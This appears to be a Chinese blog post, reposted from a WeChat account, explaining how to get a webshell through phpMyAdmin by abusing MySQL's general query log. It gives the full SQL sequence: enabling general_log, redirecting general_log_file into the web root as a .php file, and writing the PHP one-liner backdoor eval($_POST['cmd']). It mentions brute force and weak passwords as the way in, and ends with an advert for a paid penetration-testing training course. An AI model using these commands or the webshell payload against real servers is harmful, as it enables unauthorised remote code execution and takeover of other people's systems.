phpmyadmin getshell之利用日志文件

概述

 phpMyAdmin 是一个以PHP为基础，以Web-Base方式架构在网站主机上的MySQL的数据库管理工具，让管理者可用Web接口管理MySQL数据库。

 

我这边经过弱口令，爆破，目录泄露等途径已进入PhpMyadmin

收集有用信息

 

 

查看数据库路存放径

Select @@datadir;

 

成功获取数据库地址，这里呢凭自己经验来猜测根目录吧。

在这里我就不详写了，我在这里也只是写个思路！！！

 

那么问题来了！既然我们有了根目录，我们可以怎么写shell呢？

利用日志文件

mysql 5.0版本以上会创建日志文件，修改日志的全局变量，也可以getshell。但是也要对生成的日志有可读可写的权限。

(可以从信息收集得到，我们的Mysql版本是>5.0的)

查看日志状态 

show variables  like  '%general%';

开启general时，所执行的sql语句都会出现在*******.log文件。那么，如果修改general_log_file的值，所执行的sql语句会生成shell

开启日志读写

SET GLOBAL general_log='on'

 

 

 

既然开启了，那我们就来简单的Getshell

创建文件

SET GLOBAL general_log_file='C:/phpStudy/www/xxx.php'

 

对应就会生成123.php文件

 

那我们开始写一句话

SELECT '<?php eval($_POST["cmd"]);?>'

 

一句话木马生成在根目录，直接用蚁剑或者菜刀链接即可

这里我就不把shell截图出来了！

 

 

总结:这篇文章我也只是简单的提及一下思路，我之前也是因为没有根目录就算有了对方的phpmyadmin我依旧没法子getshell，所以我就写了这一篇文章，给各位在phpmyadmin getshell之路的大佬们。顺便推下自己的培训，内容如下。

---

    本期培训招生限制15（现有3人）人，本期培训是安全第八区第七期培训

课程目录请联系下方负责人获取！

或者后台回复培训获取

详情询问渗透云笔记培训部负责人

问一问又不要钱！

---

培训模式：

本期培训方式为分享屏幕进行培训，并且讲师会在私下进行一对一的问题指导以及问题解决。

---

毕业条件：待讲师的学习课程全部学完并考试通过后需要在某src平台为自己赚取3000-5000元费用。

---

本期优势：

本期培训适合上班族及学生党，所以对时间要求并不严格，但是对学生学到的知识非常严格，每个学生学完一项技术后，讲师都会针对性的布置考试、考核，保证学生对每项技术可以达到学懂、理解的程度，并且因培训方式是分享屏幕，所以讲师会适量布置作业需要学生完成作业保证学生可以不半途而费起到一个监督的作用，并且培训有毕业条件可保证学生毕业后立即可以就业或者可以保证学生入行不会挨饿。

---

培训周期：一般3-4个月，在大约3个月左右即可独立挖洞赚取赏金。

培训价格：3500元一人，可分期。

---

常见问题解答：

问：身为学生党/实习生拿不出来3500元怎么办？

答：因本培训比较适合上班族及学生党，所以已经考虑到学生党或者实习生一次性无法全款，所以支持分期模式首付2000，14天内还完剩下1500即可！

---

问：学完是否可以找到工作？

答：因本期培训是有毕业条件的，我们可以保证你顺利毕业后直接可以进行就业。

---

问：学的过程中碰到不懂的问题怎么办？

答：讲师时刻在线为您解答您的问题，但是本期培训是分享屏幕，但是学生自己的学习能力以及学生的思维能力更重要，所以建议学生先自己寻找答案，实在无法解决在联系讲师进行解答！

---

问：怕被骗咋搞？

答：安全第八区信息团队与渗透云笔记安全团队是合作伙伴，本团队所推出的培训全由渗透云笔记安全团队进行担保！

---

负责人微信号

联系请备注：培训

 

 

 

 

 

 

 

 

 

本文始发于微信公众号（渗透云笔记）：phpmyadmin getshell之利用日志文件